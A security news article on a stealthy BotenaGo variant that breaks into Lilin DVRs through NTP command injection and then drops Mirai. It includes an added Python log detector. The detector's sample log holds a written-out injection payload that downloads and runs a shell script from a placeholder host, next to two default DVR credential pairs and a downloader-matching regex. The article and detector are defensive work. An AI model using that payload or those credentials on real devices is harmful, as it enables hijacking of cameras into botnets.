New variant of the BotenaGo malware botnet spotted in the wild

Threat analysts have spotted a new variant of the BotenaGo botnet malware, and it’s the stealthiest seen so far, running undetected by any anti-virus engine.

BotenaGo is a relatively new malware written in Golang, Google’s open-source programming language.

The source code for the botnet has been publicly available for about half a year, since it was leaked in October 2021.

Since then, several variants have popped up, while the original has remained active, adding exploits that target a pool of millions of IoT devices.

Researchers at Nozomi Networks Labs have recently discovered a new variant of BotenaGo that appears to have derived from the leaked source code.

The sample they analyzed targets Lilin security camera DVR devices, which prompted the researchers to name it the “Lillin scanner”.

A stealthy new version

The most notable characteristic of the Lillin BotenaGo variant is that it goes undetected by antivirus engines on the VirusTotal scanning platform.

Lillin scanner variant completely evading detection (Nozomi)

One of the reasons for this is that its authors have removed all of the exploits present in the original BotenaGo and focus only on targeting Lilin DVRs using a two-year-old critical remote code execution flaw.

Notably, this is the same exploit used by Fodcha, another newly discovered botnet for launching distributed denial-of-service (DDoS) attacks that has recorded impressive growth.

This suggests that enough unpatched Lilin DVRs remain exposed on the internet for it to make sense for botnet authors to target them exclusively.

Gateway to Mirai

Another difference between the Lillin scanner and the original BotenaGo is that the former relies on an external mass-scanning tool to form IP address lists of exploitable devices.

Next, the malware's infection routine walks that list and attempts to authenticate to every reachable IP address, using a hardcoded list of 11 cleartext credential pairs of the kind typically left in place on poorly protected endpoints.

The Lilin-specific “root/icatch99” and “report/8Jg0SR8K50” are also included in this list. If there’s a match, the threat actors can execute arbitrary code remotely on the target.

An authentication attempt (Nozomi)

The exploit is delivered as a POST request to dvr/cmd that modifies the camera's NTP configuration, with a shell command embedded in the new setting.

If this succeeds, the new configuration causes the device to run a wget command that downloads a file (wget.sh) from 136.144.41[.]169 and then executes it. If it fails, the malware attempts to inject the same command via cn/cmd instead.

POST request with wget command (Nozomi)
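For defenders, the useful part of the description above is that both stages leave a recognisable mark in HTTP logs in front of a DVR: a login with one of the Lilin default credential pairs, followed by a POST to dvr/cmd or cn/cmd whose NTP setting carries a downloader or shell metacharacters. The detector below is an added example written for this article, not Nozomi's code or anything from the malware. It assumes a simple tab-separated request log (source IP, method, path, Authorization header, body), HTTP Basic authentication as the credential transport, and an XML-style body; the log lines are constructed for the example and are not captured traffic, and the download host 203.0.113.10 is an RFC 5737 placeholder. Only the two credential pairs quoted in the article are listed; the other nine in the real variant are not on the page.

```python
"""Flag HTTP requests matching the Lilin DVR NTP command-injection pattern.

Added example (not Nozomi's or the malware author's code). Log format, Basic
auth transport and the XML-style body are assumptions made for illustration.
"""
import base64
import re
from typing import List, Optional, Tuple

# Endpoints the injection is submitted to, per the write-up.
TARGET_ENDPOINTS = ("/dvr/cmd", "/cn/cmd")

# The two Lilin-specific default credential pairs quoted in the article.
# The real variant carries 11 pairs; the rest are not public on the page.
KNOWN_DEFAULT_CREDS = {("root", "icatch99"), ("report", "8Jg0SR8K50")}

# A body that touches the NTP configuration ...
NTP_RE = re.compile(r"ntp", re.IGNORECASE)
# ... and carries a downloader/interpreter name or shell metacharacters.
INJECTION_RE = re.compile(r"\b(?:wget|curl|tftp|busybox|sh)\b|[;&|`$]")


def _basic(user: str, password: str) -> str:
    """Build a Basic Authorization header value (used only for sample data)."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


# Constructed sample log: src_ip, method, path, Authorization, body (tab-separated).
SAMPLE_LOG = "\n".join([
    # Stage 1 + 2 from one scanner host: default creds, then NTP injection on dvr/cmd.
    "198.51.100.7\tPOST\t/dvr/cmd\t" + _basic("root", "icatch99") +
    '\t<Service><NTP Enable="True" Server="time.nist.gov;wget http://203.0.113.10/wget.sh -O /tmp/w.sh;sh /tmp/w.sh"/></Service>',
    # Fallback path cn/cmd with the second default pair.
    "198.51.100.7\tPOST\t/cn/cmd\t" + _basic("report", "8Jg0SR8K50") +
    '\t<Service><NTP Enable="True" Server="time.nist.gov|sh"/></Service>',
    # Legitimate NTP change by an admin with a non-default password: must not fire.
    "192.0.2.20\tPOST\t/dvr/cmd\t" + _basic("admin", "Str0ngPassw0rd!") +
    '\t<Service><NTP Enable="True" Server="pool.ntp.org"/></Service>',
    # Unauthenticated GET with no body: ignored.
    "192.0.2.21\tGET\t/dvr/cmd\t-\t",
])


def parse_basic_auth(header: str) -> Optional[Tuple[str, str]]:
    """Return (user, password) from a Basic Authorization header, else None."""
    if not header.startswith("Basic "):
        return None
    try:
        decoded = base64.b64decode(header[6:], validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


def classify_request(method: str, path: str, auth_header: str, body: str) -> List[str]:
    """Return a list of finding tags for one request (empty if benign)."""
    findings = []
    creds = parse_basic_auth(auth_header)
    if creds in KNOWN_DEFAULT_CREDS:
        findings.append(f"default-credentials:{creds[0]}")
    if method == "POST" and path in TARGET_ENDPOINTS:
        if NTP_RE.search(body) and INJECTION_RE.search(body):
            findings.append(f"ntp-command-injection:{path}")
    return findings


def scan_log(text: str) -> List[Tuple[str, List[str]]]:
    """Return (src_ip, findings) for every log line that raised a finding."""
    hits = []
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) != 5:
            continue  # malformed line: skip rather than crash the scan
        src_ip, method, path, auth, body = fields
        findings = classify_request(method, path, auth, body)
        if findings:
            hits.append((src_ip, findings))
    return hits


if __name__ == "__main__":
    for src, tags in scan_log(SAMPLE_LOG):
        print(src, ", ".join(tags))
```

Two things to keep in mind when adapting this: if the DVR's real body is XML, unescape entities such as `&amp;` before matching, or the `&` class will fire on legitimate content; and a hit on the default-credential check alone is worth an alert even without the injection stage, since a successful login with `root/icatch99` means the device is one the Lillin scanner would take over.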

The wget.sh file downloads Mirai payloads compiled for multiple architectures and executes them on the compromised device.

Some of these payloads were uploaded to VirusTotal as recently as March 2022, suggesting that the campaign is still in its testing phase.

Nozomi researchers report that Mirai features some IP range exclusions to avoid infecting the U.S. Department of Defense (DoD), the U.S. Postal Service (USPS), General Electric (GE), Hewlett-Packard (HP), and others.

IP range exclusions on the Mirai (Nozomi)

Mirai then takes over with a much wider set of exploits and target devices, so in this campaign the Lilin DVR exploit serves as a gateway to a larger infection wave.

Not a massive threat

The Lillin scanner variant doesn't appear to be a massive threat to IoT devices, given its very narrow targeting, even though the second-stage Mirai payload has far more potential.

Moreover, it can't propagate on its own, since the scanning and infection functions are manually operated, so it is a narrowly targeted threat, or perhaps still in an experimental stage.

Still, it’s an interesting new botnet project that proves how easy it is for malware authors to build completely stealthy botnets out of known, documented code.

Finally, it’s another example of how less skilled cybercriminals can take advantage of leaked malware source code to set up their own operations.
